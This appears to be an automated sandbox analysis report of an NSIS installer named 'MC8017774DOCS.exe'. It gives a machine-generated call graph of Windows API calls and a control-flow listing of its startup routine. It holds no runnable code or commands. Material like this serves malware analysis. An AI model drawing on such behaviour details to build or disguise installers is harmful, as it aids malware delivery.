5384->5386 5387 401a1c 5385->5387 5386->5387 5388 401000 5389 401037 BeginPaint GetClientRect 5388->5389 5392 40100c DefWindowProcW 5388->5392 5390 4010f3 5389->5390 5393 401073 CreateBrushIndirect FillRect DeleteObject 5390->5393 5394 4010fc 5390->5394 5395 401179 5392->5395 5393->5390 5396 401102 CreateFontIndirectW 5394->5396 5397 401167 EndPaint 5394->5397 5396->5397 5398 401112 6 API calls 5396->5398 5397->5395 5398->5397 5399 6e9b16d8 5400 6e9b1707 5399->5400 5401 6e9b1b63 22 API calls 5400->5401 5402 6e9b170e 5401->5402 5403 6e9b1721 5402->5403 5404 6e9b1715 5402->5404 5406 6e9b172b 5403->5406 5407 6e9b1748 5403->5407 5405 6e9b1272 2 API calls 5404->5405 5408 6e9b171f 5405->5408 5409 6e9b153d 3 API calls 5406->5409 5410 6e9b174e 5407->5410 5411 6e9b1772 5407->5411 5414 6e9b1730 5409->5414 5412 6e9b15b4 3 API calls 5410->5412 5413 6e9b153d 3 API calls 5411->5413 5415 6e9b1753 5412->5415 5413->5408 5416 6e9b15b4 3 API calls 5414->5416 5417 6e9b1272 2 API calls 5415->5417 5418 6e9b1736 5416->5418 5419 6e9b1759 GlobalFree 5417->5419 5420 6e9b1272 2 API calls 5418->5420 5419->5408 5421 6e9b176d GlobalFree 5419->5421 5422 6e9b173c GlobalFree 5420->5422 5421->5408 5422->5408 5423 6e9b1058 5425 6e9b1074 5423->5425 5424 6e9b10dd 5425->5424 5426 6e9b1516 GlobalFree 5425->5426 5428 6e9b1092 5425->5428 5426->5428 5427 6e9b1516 GlobalFree 5429 6e9b10a2 5427->5429 5428->5427 5430 6e9b10a9 GlobalSize 5429->5430 5431 6e9b10b2 5429->5431 5430->5431 5432 6e9b10c7 5431->5432 5433 6e9b10b6 GlobalAlloc 5431->5433 5435 6e9b10d2 GlobalFree 5432->5435 5434 6e9b153d 3 API calls 5433->5434 5434->5432 5435->5424 5436 401503 5437 40150b 5436->5437 5439 40151e 5436->5439 5438 402c1f 17 API calls 5437->5438 5438->5439 4276 402484 4287 402c81 4276->4287 4279 402c41 17 API calls 4280 402497 4279->4280 4281 4024a2 RegQueryValueExW 4280->4281 4282 40288b 4280->4282 4283 4024c2 4281->4283 4286 4024c8 RegCloseKey 4281->4286 4283->4286 4292 4061de wsprintfW 4283->4292 4286->4282 4288 402c41 17 API calls 4287->4288 4289 402c98 4288->4289 4290 406104 RegOpenKeyExW 4289->4290 4291 40248e 4290->4291 4291->4279 4292->4286 5440 402104 5441 402c41 17 API calls 5440->5441 5442 40210b 5441->5442 5443 402c41 17 API calls 5442->5443 5444 402115 5443->5444 5445 402c41 17 API calls 5444->5445 5446 40211f 5445->5446 5447 402c41 17 API calls 5446->5447 5448 402129 5447->5448 5449 402c41 17 API calls 5448->5449 5451 402133 5449->5451 5450 402172 CoCreateInstance 5455 402191 5450->5455 5451->5450 5452 402c41 17 API calls 5451->5452 5452->5450 5453 401423 24 API calls 5454 402250 5453->5454 5455->5453 5455->5454 5456 6e9b18dd 5457 6e9b1900 5456->5457 5458 6e9b1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5457->5458 5459 6e9b1935 GlobalFree 5457->5459 5460 6e9b1272 2 API calls 5458->5460 5459->5458 5461 6e9b1ad2 GlobalFree GlobalFree 5460->5461 5462 401f06 5463 402c41 17 API calls 5462->5463 5464 401f0c 5463->5464 5465 4052ff 24 API calls 5464->5465 5466 401f16 5465->5466 5467 405880 2 API calls 5466->5467 5468 401f1c 5467->5468 5469 40288b 5468->5469 5470 406722 5 API calls 5468->5470 5472 401f3f CloseHandle 5468->5472 5473 401f31 5470->5473 5472->5469 5473->5472 5475 4061de wsprintfW 5473->5475 5475->5472 5476 40190c 5477 401943 5476->5477 5478 402c41 17 API calls 5477->5478 5479 401948 5478->5479 5480 4059a9 67 API calls 5479->5480 5481 401951 5480->5481 5482 40230c 5483 402314 5482->5483 5484 40231a 5482->5484 5485 402c41 17 API calls 5483->5485 5486 402328 5484->5486 5487 402c41 17 API calls 5484->5487 5485->5484 5488 402336 5486->5488 5489 402c41 17 API calls 5486->5489 5487->5486 5490 402c41 17 API calls 5488->5490 5489->5488 5491 40233f WritePrivateProfileStringW 5490->5491 5492 401f8c 5493 402c41 17 API calls 5492->5493 5494 401f93 5493->5494 5495 406671 5 API calls 5494->5495 5496 401fa2 5495->5496 5497 401fbe GlobalAlloc 5496->5497 5502 402026 5496->5502 5498 401fd2 5497->5498 5497->5502 5499 406671 5 API calls 5498->5499 5500 401fd9 5499->5500 5501 406671 5 API calls 5500->5501 5503 401fe3 5501->5503 5503->5502 5507 4061de wsprintfW 5503->5507 5505 402018 5508 4061de wsprintfW 5505->5508 5507->5505 5508->5502 5509 40238e 5510 4023c1 5509->5510 5511 402396 5509->5511 5513 402c41 17 API calls 5510->5513 5512 402c81 17 API calls 5511->5512 5514 40239d 5512->5514 5515 4023c8 5513->5515 5517 402c41 17 API calls 5514->5517 5518 4023d5 5514->5518 5520 402cff 5515->5520 5519 4023ae RegDeleteValueW RegCloseKey 5517->5519 5519->5518 5521 402d13 5520->5521 5522 402d0c 5520->5522 5521->5522 5524 402d44 5521->5524 5522->5518 5525 406104 RegOpenKeyExW 5524->5525 5528 402d72 5525->5528 5526 402dc3 5526->5522 5527 402d98 RegEnumKeyW 5527->5528 5529 402daf RegCloseKey 5527->5529 5528->5526 5528->5527 5528->5529 5530 402dd0 RegCloseKey 5528->5530 5532 402d44 6 API calls 5528->5532 5531 406671 5 API calls 5529->5531 5530->5526 5533 402dbf 5531->5533 5532->5528 5533->5526 5534 402de0 RegDeleteKeyW 5533->5534 5534->5526 5535 40190f 5536 402c41 17 API calls 5535->5536 5537 401916 5536->5537 5538 4058fd MessageBoxIndirectW 5537->5538 5539 40191f 5538->5539 5540 401491 5541 4052ff 24 API calls 5540->5541 5542 401498 5541->5542 5543 6e9b2c4f 5544 6e9b2c67 5543->5544 5545 6e9b158f 2 API calls 5544->5545 5546 6e9b2c82 5545->5546 5547 401d14 5548 402c1f 17 API calls 5547->5548 5549 401d1b 5548->5549 5550 402c1f 17 API calls 5549->5550 5551 401d27 GetDlgItem 5550->5551 5552 402592 5551->5552 5553 402598 5554 4025c7 5553->5554 5555 4025ac 5553->5555 5556 4025fb 5554->5556 5557 4025cc 5554->5557 5558 402c1f 17 API calls 5555->5558 5560 402c41 17 API calls 5556->5560 5559 402c41 17 API calls 5557->5559 5565 4025b3 5558->5565 5561 4025d3 WideCharToMultiByte lstrlenA 5559->5561 5562 402602 lstrlenW 5560->5562 5561->5565 5562->5565 5563 402645 5564 405e3f WriteFile 5564->5563 5565->5563 5566 405e6e 5 API calls 5565->5566 5567 40262f 5565->5567 5566->5567 5567->5563 5567->5564 5568 40149e 5569 4022f7 5568->5569 5570 4014ac PostQuitMessage 5568->5570 5570->5569 5571 401c1f 5572 402c1f 17 API calls 5571->5572 5573 401c26 5572->5573 5574 402c1f 17 API calls 5573->5574 5575 401c33 5574->5575 5576 401c48 5575->5576 5577 402c41 17 API calls 5575->5577 5578 401c58 5576->5578 5579 402c41 17 API calls 5576->5579 5577->5576 5580 401c63 5578->5580 5581 401caf 5578->5581 5579->5578 5583 402c1f 17 API calls 5580->5583 5582 402c41 17 API calls 5581->5582 5584 401cb4 5582->5584 5585 401c68 5583->5585 5586 402c41 17 API calls 5584->5586 5587 402c1f 17 API calls 5585->5587 5588 401cbd FindWindowExW 5586->5588 5589 401c74 5587->5589 5592 401cdf 5588->5592 5590 401c81 SendMessageTimeoutW 5589->5590 5591 401c9f SendMessageW 5589->5591 5590->5592 5591->5592 5593 402aa0 SendMessageW 5594 402aba InvalidateRect 5593->5594 5595 402ac5 5593->5595 5594->5595 5596 402821 5597 402827 5596->5597 5598 402ac5 5597->5598 5599 40282f FindClose 5597->5599 5599->5598 4220 4015a3 4221 402c41 17 API calls 4220->4221 4222 4015aa SetFileAttributesW 4221->4222 4223 4015bc 4222->4223 5600 4029a8 5601 402c1f 17 API calls 5600->5601 5602 4029ae 5601->5602 5603 4029d5 5602->5603 5604 4029ee 5602->5604 5605 40288b 5602->5605 5606 4029da 5603->5606 5613 4029eb 5603->5613 5607 402a08 5604->5607 5608 4029f8 5604->5608 5614 406297 lstrcpynW 5606->5614 5610 4062b9 17 API calls 5607->5610 5609 402c1f 17 API calls 5608->5609 5609->5613 5610->5613 5613->5605 5615 4061de wsprintfW 5613->5615 5614->5605 5615->5605 5616 6e9b1671 5617 6e9b1516 GlobalFree 5616->5617 5619 6e9b1689 5617->5619 5618 6e9b16cf GlobalFree 5619->5618 5620 6e9b16a4 5619->5620 5621 6e9b16bb VirtualFree 5619->5621 5620->5618 5621->5618 5622 4028ad 5623 402c41 17 API calls 5622->5623 5625 4028bb 5623->5625 5624 4028d1 5627 405d68 2 API calls 5624->5627 5625->5624 5626 402c41 17 API calls 5625->5626 5626->5624 5628 4028d7 5627->5628 5650 405d8d GetFileAttributesW CreateFileW 5628->5650 5630 4028e4 5631 4028f0 GlobalAlloc 5630->5631 5632 402987 5630->5632 5633 402909 5631->5633 5634 40297e CloseHandle 5631->5634 5635 4029a2 5632->5635 5636 40298f DeleteFileW 5632->5636 5651 403324 SetFilePointer 5633->5651 5634->5632 5636->5635 5638 40290f 5639 40330e ReadFile 5638->5639 5640 402918 GlobalAlloc 5639->5640 5641 402928 5640->5641 5642 40295c 5640->5642 5644 403116 31 API calls 5641->5644 5643 405e3f WriteFile 5642->5643 5645 402968 GlobalFree 5643->5645 5649 402935 5644->5649 5646 403116 31 API calls 5645->5646 5647 40297b 5646->5647 5647->5634 5648 402953 GlobalFree 5648->5642 5649->5648 5650->5630 5651->5638 5652 401a30 5653 402c41 17 API calls 5652->5653 5654 401a39 ExpandEnvironmentStringsW 5653->5654 5655 401a4d 5654->5655 5657 401a60 5654->5657 5656 401a52 lstrcmpW 5655->5656 5655->5657 5656->5657 4609 402032 4610 402044 4609->4610 4611 4020f6 4609->4611 4612 402c41 17 API calls 4610->4612 4613 401423 24 API calls 4611->4613 4614 40204b 4612->4614 4620 402250 4613->4620 4615 402c41 17 API calls 4614->4615 4616 402054 4615->4616 4617 40206a LoadLibraryExW 4616->4617 4618 40205c GetModuleHandleW 4616->4618 4617->4611 4619 40207b 4617->4619 4618->4617 4618->4619 4632 4066e0 WideCharToMultiByte 4619->4632 4623 4020c5 4625 4052ff 24 API calls 4623->4625 4624 40208c 4626 402094 4624->4626 4627 4020ab 4624->4627 4629 40209c 4625->4629 4628 401423 24 API calls 4626->4628 4635 6e9b177b 4627->4635 4628->4629 4629->4620 4630 4020e8 FreeLibrary 4629->4630 4630->4620 4633 40670a GetProcAddress 4632->4633 4634 402086 4632->4634 4633->4634 4634->4623 4634->4624 4636 6e9b17ae 4635->4636 4677 6e9b1b63 4636->4677 4638 6e9b17b5 4639 6e9b18da 4638->4639 4640 6e9b17cd 4638->4640 4641 6e9b17c6 4638->4641 4639->4629 4711 6e9b2398 4640->4711 4727 6e9b2356 4641->4727 4646 6e9b1813 4740 6e9b256d 4646->4740 4647 6e9b1831 4652 6e9b1882 4647->4652 4653 6e9b1837 4647->4653 4648 6e9b17fc 4661 6e9b17f2 4648->4661 4737 6e9b2d2f 4648->4737 4649 6e9b17e3 4651 6e9b17e9 4649->4651 4657 6e9b17f4 4649->4657 4651->4661 4721 6e9b2a74 4651->4721 4655 6e9b256d 10 API calls 4652->4655 4759 6e9b15c6 4653->4759 4667 6e9b1873 4655->4667 4656 6e9b1819 4751 6e9b15b4 4656->4751 4731 6e9b2728 4657->4731 4661->4646 4661->4647 4664 6e9b256d 10 API calls 4664->4667 4666 6e9b17fa 4666->4661 4668 6e9b18c9 4667->4668 4766 6e9b2530 4667->4766 4668->4639 4670 6e9b18d3 GlobalFree 4668->4670 4670->4639 4674 6e9b18b5 4674->4668 4770 6e9b153d wsprintfW 4674->4770 4675 6e9b18ae FreeLibrary 4675->4674 4773 6e9b121b GlobalAlloc 4677->4773 4679 6e9b1b87 4774 6e9b121b GlobalAlloc 4679->4774 4681 6e9b1dad GlobalFree GlobalFree GlobalFree 4682 6e9b1dca 4681->4682 4700 6e9b1e14 4681->4700 4683 6e9b2196 4682->4683 4691 6e9b1ddf 4682->4691 4682->4700 4685 6e9b21b8 GetModuleHandleW 4683->4685 4683->4700 4684 6e9b1c68 GlobalAlloc 4707 6e9b1b92 4684->4707 4688 6e9b21c9 LoadLibraryW 4685->4688 4689 6e9b21de 4685->4689 4686 6e9b1cb3 lstrcpyW 4690 6e9b1cbd lstrcpyW 4686->4690 4687 6e9b1cd1 GlobalFree 4687->4707 4688->4689 4688->4700 4781 6e9b1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4689->4781 4690->4707 4691->4700 4777 6e9b122c 4691->4777 4693 6e9b2230 4695 6e9b223d lstrlenW 4693->4695 4693->4700 4694 6e9b2068 4780 6e9b121b GlobalAlloc 4694->4780 4782 6e9b1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4695->4782 4697 6e9b20f0 4697->4700 4705 6e9b2138 lstrcpyW 4697->4705 4700->4638 4701 6e9b21f0 4701->4693 4709 6e9b221a GetProcAddress 4701->4709 4702 6e9b2257 4702->4700 4703 6e9b1d0f 4703->4707 4775 6e9b158f GlobalSize GlobalAlloc 4703->4775 4704 6e9b1fa9 GlobalFree 4704->4707 4705->4700 4707->4681 4707->4684 4707->4686 4707->4687 4707->4690 4707->4694 4707->4697 4707->4700 4707->4703 4707->4704 4708 6e9b122c 2 API calls 4707->4708 4708->4707 4709->4693 4710 6e9b2071 4710->4638 4718 6e9b23b0 4711->4718 4712 6e9b122c GlobalAlloc lstrcpynW 4712->4718 4714 6e9b24d9 GlobalFree 4717 6e9b17d3 4714->4717 4714->4718 4715 6e9b2458 GlobalAlloc WideCharToMultiByte 4715->4714 4716 6e9b2483 GlobalAlloc CLSIDFromString 4716->4714 4717->4648 4717->4649 4717->4661 4718->4712 4718->4714 4718->4715 4718->4716 4720 6e9b24a2 4718->4720 4784 6e9b12ba 4718->4784 4720->4714 4788 6e9b26bc 4720->4788 4722 6e9b2a86 4721->4722 4723 6e9b2b2b ReadFile 4722->4723 4724 6e9b2b49 4723->4724 4725 6e9b2c3a GetLastError 4724->4725 4726 6e9b2c45 4724->4726 4725->4726 4726->4661 4728 6e9b236b 4727->4728 4729 6e9b2376 GlobalAlloc 4728->4729 4730 6e9b17cc 4728->4730 4729->4728 4730->4640 4735 6e9b2758 4731->4735 4732 6e9b27f3 GlobalAlloc 4736 6e9b2816 4732->4736 4733 6e9b2806 4734 6e9b280c GlobalSize 4733->4734 4733->4736 4734->4736 4735->4732 4735->4733 4736->4666 4738 6e9b2d3a 4737->4738 4739 6e9b2d7a GlobalFree 4738->4739 4791 6e9b121b GlobalAlloc 4740->4791 4742 6e9b2623 lstrcpynW 4749 6e9b2577 4742->4749 4743 6e9b2612 StringFromGUID2 4743->4749 4744 6e9b25f0 MultiByteToWideChar 4744->4749 4745 6e9b265a GlobalFree 4745->4749 4746 6e9b2636 wsprintfW 4746->4749 4747 6e9b268f GlobalFree 4747->4656 4748 6e9b1272 2 API calls 4748->4749 4749->4742 4749->4743 4749->4744 4749->4745 4749->4746 4749->4747 4749->4748 4792 6e9b12e1 4749->4792 4796 6e9b121b GlobalAlloc 4751->4796 4753 6e9b15b9 4754 6e9b15c6 2 API calls 4753->4754 4755 6e9b15c3 4754->4755 4756 6e9b1272 4755->4756 4757 6e9b127b GlobalAlloc lstrcpynW 4756->4757 4758 6e9b12b5 GlobalFree 4756->4758 4757->4758 4758->4667 4760 6e9b15d6 lstrcpyW 4759->4760 4761 6e9b15e4 4759->4761 4764 6e9b161d 4760->4764 4761->4760 4763 6e9b15f0 4761->4763 4763->4764 4765 6e9b160d wsprintfW 4763->4765 4764->4664 4765->4764 4767 6e9b253e 4766->4767 4768 6e9b1895 4766->4768 4767->4768 4769 6e9b255a GlobalFree 4767->4769 4768->4674 4768->4675 4769->4767 4771 6e9b1272 2 API calls 4770->4771 4772 6e9b155e 4771->4772 4772->4668 4773->4679 4774->4707 4776 6e9b15ad 4775->4776 4776->4703 4783 6e9b121b GlobalAlloc 4777->4783 4779 6e9b123b lstrcpynW 4779->4700 4780->4710 4781->4701 4782->4702 4783->4779 4785 6e9b12c1 4784->4785 4786 6e9b122c 2 API calls 4785->4786 4787 6e9b12df 4786->4787 4787->4718 4789 6e9b26ca VirtualAlloc 4788->4789 4790 6e9b2720 4788->4790 4789->4790 4790->4720 4791->4749 4793 6e9b12ea 4792->4793 4794 6e9b130c 4792->4794 4793->4794 4795 6e9b12f0 lstrcpyW 4793->4795 4794->4749 4795->4794 4796->4753 4828 403d35 4829 403e88 4828->4829 4830 403d4d 4828->4830 4832 403ed9 4829->4832 4833 403e99 GetDlgItem GetDlgItem 4829->4833 4830->4829 4831 403d59 4830->4831 4834 403d64 SetWindowPos 4831->4834 4835 403d77 4831->4835 4837 403f33 4832->4837 4846 401389 2 API calls 4832->4846 4836 40420e 18 API calls 4833->4836 4834->4835 4839 403d94 4835->4839 4840 403d7c ShowWindow 4835->4840 4841 403ec3 SetClassLongW 4836->4841 4838 40425a SendMessageW 4837->4838 4842 403e83 4837->4842 4869 403f45 4838->4869 4843 403db6 4839->4843 4844 403d9c DestroyWindow 4839->4844 4840->4839 4845 40140b 2 API calls 4841->4845 4848 403dbb SetWindowLongW 4843->4848 4849 403dcc 4843->4849 4847 4041b8 4844->4847 4845->4832 4850 403f0b 4846->4850 4847->4842 4857 4041c8 ShowWindow 4847->4857 4848->4842 4853 403e75 4849->4853 4854 403dd8 GetDlgItem 4849->4854 4850->4837 4855 403f0f SendMessageW 4850->4855 4851 40140b 2 API calls 4851->4869 4852 404199 DestroyWindow EndDialog 4852->4847 4909 404275 4853->4909 4858 403e08 4854->4858 4859 403deb SendMessageW IsWindowEnabled 4854->4859 4855->4842 4857->4842 4861 403e15 4858->4861 4862 403e5c SendMessageW 4858->4862 4863 403e28 4858->4863 4872 403e0d 4858->4872 4859->4842 4859->4858 4860 4062b9 17 API calls 4860->4869 4861->4862 4861->4872 4862->4853 4866 403e30 4863->4866 4867 403e45 4863->4867 4865 40420e 18 API calls 4865->4869 4870 40140b 2 API calls 4866->4870 4871 40140b 2 API calls 4867->4871 4868 403e43 4868->4853 4869->4842 4869->4851 4869->4852 4869->4860 4869->4865 4890 4040d9 DestroyWindow 4869->4890 4900 40420e 4869->4900 4870->4872 4873 403e4c 4871->4873 4906 4041e7 4872->4906 4873->4853 4873->4872 4875 403fc0 GetDlgItem 4876 403fd5 4875->4876 4877 403fdd ShowWindow KiUserCallbackDispatcher 4875->4877 4876->4877 4903 404230 EnableWindow 4877->4903 4879 404007 EnableWindow 4884 40401b 4879->4884 4880 404020 GetSystemMenu EnableMenuItem SendMessageW 4881 404050 SendMessageW 4880->4881 4880->4884 4881->4884 4883 403d16 18 API calls 4883->4884 4884->4880 4884->4883 4904 404243 SendMessageW 4884->4904 4905 406297 lstrcpynW 4884->4905 4886 40407f lstrlenW 4887 4062b9 17 API calls 4886->4887 4888 404095 SetWindowTextW 4887->4888 4889 401389 2 API calls 4888->4889 4889->4869 4890->4847 4891 4040f3 CreateDialogParamW 4890->4891 4891->4847 4892 404126 4891->4892 4893 40420e 18 API calls 4892->4893 4894 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4893->4894 4895 401389 2 API calls 4894->4895 4896 404177 4895->4896 4896->4842 4897 40417f ShowWindow 4896->4897 4898 40425a SendMessageW 4897->4898 4899 404197 4898->4899 4899->4847 4901 4062b9 17 API calls 4900->4901 4902 404219 SetDlgItemTextW 4901->4902 4902->4875 4903->4879 4904->4884 4905->4886 4907 4041f4 SendMessageW 4906->4907 4908 4041ee 4906->4908 4907->4868 4908->4907 4910 404338 4909->4910 4911 40428d GetWindowLongW 4909->4911 4910->4842 4911->4910 4912 4042a2 4911->4912 4912->4910 4913 4042d2 4912->4913 4914 4042cf GetSysColor 4912->4914 4915 4042e2 SetBkMode 4913->4915 4916 4042d8 SetTextColor 4913->4916 4914->4913 4917 404300 4915->4917 4918 4042fa GetSysColor 4915->4918 4916->4915 4919 404311 4917->4919 4920 404307 SetBkColor 4917->4920 4918->4917 4919->4910 4921 404324 DeleteObject 4919->4921 4922 40432b CreateBrushIndirect 4919->4922 4920->4919 4921->4922 4922->4910 5663 402a35 5664 402c1f 17 API calls 5663->5664 5665 402a3b 5664->5665 5666 402a72 5665->5666 5667 402a4d 5665->5667 5669 40288b 5665->5669 5668 4062b9 17 API calls 5666->5668 5666->5669 5667->5669 5671 4061de wsprintfW 5667->5671 5668->5669 5671->5669 5672 401735 5673 402c41 17 API calls 5672->5673 5674 40173c SearchPathW 5673->5674 5675 4029e6 5674->5675 5676 401757 5674->5676 5676->5675 5678 406297 lstrcpynW 5676->5678 5678->5675 5679 4014b8 5680 4014be 5679->5680 5681 401389 2 API calls 5680->5681 5682 4014c6 5681->5682 5683 4046b8 5684 4046c8 5683->5684 5685 4046ee 5683->5685 5686 40420e 18 API calls 5684->5686 5687 404275 8 API calls 5685->5687 5689 4046d5 SetDlgItemTextW 5686->5689 5688 4046fa 5687->5688 5689->5685 5690 401db9 GetDC 5691 402c1f 17 API calls 5690->5691 5692 401dcb GetDeviceCaps MulDiv ReleaseDC 5691->5692 5693 402c1f 17 API calls 5692->5693 5694 401dfc 5693->5694 5695 4062b9 17 API calls 5694->5695 5696 401e39 CreateFontIndirectW 5695->5696 5697 402592 5696->5697 5698 6e9b10e1 5700 6e9b1111 5698->5700 5699 6e9b11d8 GlobalFree 5700->5699 5701 6e9b12ba 2 API calls 5700->5701 5702 6e9b11d3 5700->5702 5703 6e9b1272 2 API calls 5700->5703 5704 6e9b1164 GlobalAlloc 5700->5704 5705 6e9b11f8 GlobalFree 5700->5705 5706 6e9b11c4 GlobalFree 5700->5706 5707 6e9b12e1 lstrcpyW 5700->5707 5701->5700 5702->5699 5703->5706 5704->5700 5705->5700 5706->5700 5707->5700 5708 40283b 5709 402843 5708->5709 5710 402847 FindNextFileW 5709->5710 5711 402859 5709->5711 5710->5711 5712 4029e6 5711->5712 5714 406297 lstrcpynW 5711->5714 5714->5712 5715 40543e 5716 4055e8 5715->5716 5717 40545f GetDlgItem GetDlgItem GetDlgItem 5715->5717 5719 4055f1 GetDlgItem CreateThread CloseHandle 5716->5719 5720 405619 5716->5720 5760 404243 SendMessageW 5717->5760 5719->5720 5722 405644 5720->5722 5723 405630 ShowWindow ShowWindow 5720->5723 5724 405669 5720->5724 5721 4054cf 5727 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5721->5727 5725 4056a4 5722->5725 5729 405658 5722->5729 5730 40567e ShowWindow 5722->5730 5762 404243 SendMessageW 5723->5762 5726 404275 8 API calls 5724->5726 5725->5724 5736 4056b2 SendMessageW 5725->5736 5731 405677 5726->5731 5734 405544 5727->5734 5735 405528 SendMessageW SendMessageW 5727->5735 5737 4041e7 SendMessageW 5729->5737 5732 405690 5730->5732 5733 40569e 5730->5733 5738 4052ff 24 API calls 5732->5738 5739 4041e7 SendMessageW 5733->5739 5740 405557 5734->5740 5741 405549 SendMessageW 5734->5741 5735->5734 5736->5731 5742 4056cb CreatePopupMenu 5736->5742 5737->5724 5738->5733 5739->5725 5744 40420e 18 API calls 5740->5744 5741->5740 5743 4062b9 17 API calls 5742->5743 5745 4056db AppendMenuW 5743->5745 5746 405567 5744->5746 5747 4056f8 GetWindowRect 5745->5747 5748 40570b TrackPopupMenu 5745->5748 5749 405570 ShowWindow 5746->5749 5750 4055a4 GetDlgItem SendMessageW 5746->5750 5747->5748 5748->5731 5752 405726 5748->5752 5753 405593 5749->5753 5754 405586 ShowWindow 5749->5754 5750->5731 5751 4055cb SendMessageW SendMessageW 5750->5751 5751->5731 5755 405742 SendMessageW 5752->5755 5761 404243 SendMessageW 5753->5761 5754->5753 5755->5755 5756 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5755->5756 5758 405784 SendMessageW 5756->5758 5758->5758 5759 4057ad GlobalUnlock SetClipboardData CloseClipboard 5758->5759 5759->5731 5760->5721 5761->5750 5762->5722

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 0040336C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 30 403495-40349a 28->30 31 40349c-4034a0 28->31 38 403610-40362a DeleteFileW call 402edd 29->38 39 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->39 30->30 30->31 33 4034a2-4034a6 31->33 34 4034a7-4034ab 31->34 33->34 36 4034b1-4034b7 34->36 37 40356a-403577 call 405b99 34->37 42 4034d2-40350b 36->42 43 4034b9-4034c1 36->43 52 403579-40357a 37->52 53 40357b-403581 37->53 54 403630-403636 38->54 55 4036db-4036eb call 4038ad OleUninitialize 38->55 39->38 58 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 39->58 49 403528-403562 42->49 50 40350d-403512 42->50 47 4034c3-4034c6 43->47 48 4034c8 43->48 47->42 47->48 48->42 49->37 57 403564-403568 49->57 50->49 56 403514-40351c 50->56 52->53 53->28 59 403587 53->59 60 4036cb-4036d2 call 403987 54->60 61 40363c-403647 call 405b99 54->61 75 403811-403817 55->75 76 4036f1-403701 call 4058fd ExitProcess 55->76 63 403523 56->63 64 40351e-403521 56->64 57->37 65 403589-403597 call 406297 57->65 58->38 58->55 68 40359c 59->68 74 4036d7 60->74 79 403695-40369f 61->79 80 403649-40367e 61->80 63->49 64->49 64->63 65->68 68->29 74->55 77 403895-40389d 75->77 78 403819-40382f GetCurrentProcess OpenProcessToken 75->78 85 4038a3-4038a7 ExitProcess 77->85 86 40389f 77->86 82 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 78->82 83 403865-403873 call 406671 78->83 87 4036a1-4036af call 405c74 79->87 88 403707-40371b call 405868 lstrcatW 79->88 84 403680-403684 80->84 82->83 102 403881-40388c ExitWindowsEx 83->102 103 403875-40387f 83->103 92 403686-40368b 84->92 93 40368d-403691 84->93 86->85 87->55 99 4036b1-4036c7 call 406297 * 2 87->99 100 403728-403742 lstrcatW lstrcmpiW 88->100 101 40371d-403723 lstrcatW 88->101 92->93 98 403693 92->98 93->84 93->98 98->79 99->60 100->55 105 403744-403747 100->105 101->100 102->77 106 40388e-403890 call 40140b 102->106 103->102 103->106 108 403750 call 40584b 105->108 109 403749-40374e call 4057ce 105->109 106->77 117 403755-403763 SetCurrentDirectoryW 108->117 109->117 118 403770-403799 call 406297 117->118 119 403765-40376b call 406297 117->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 129 403805-40380c call 40605d 126->129 127->126 128 4037ce-4037ee call 40605d call 4062b9 call 405880 127->128 128->126 138 4037f0-4037f7 CloseHandle 128->138 129->55 138->126
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE ref: 0040338F
                                                                                                                                                    • GetVersion.KERNEL32 ref: 00403395
                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                                                                                                    • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                                                                                                    • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000020,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                                                                                                      • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                                      • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
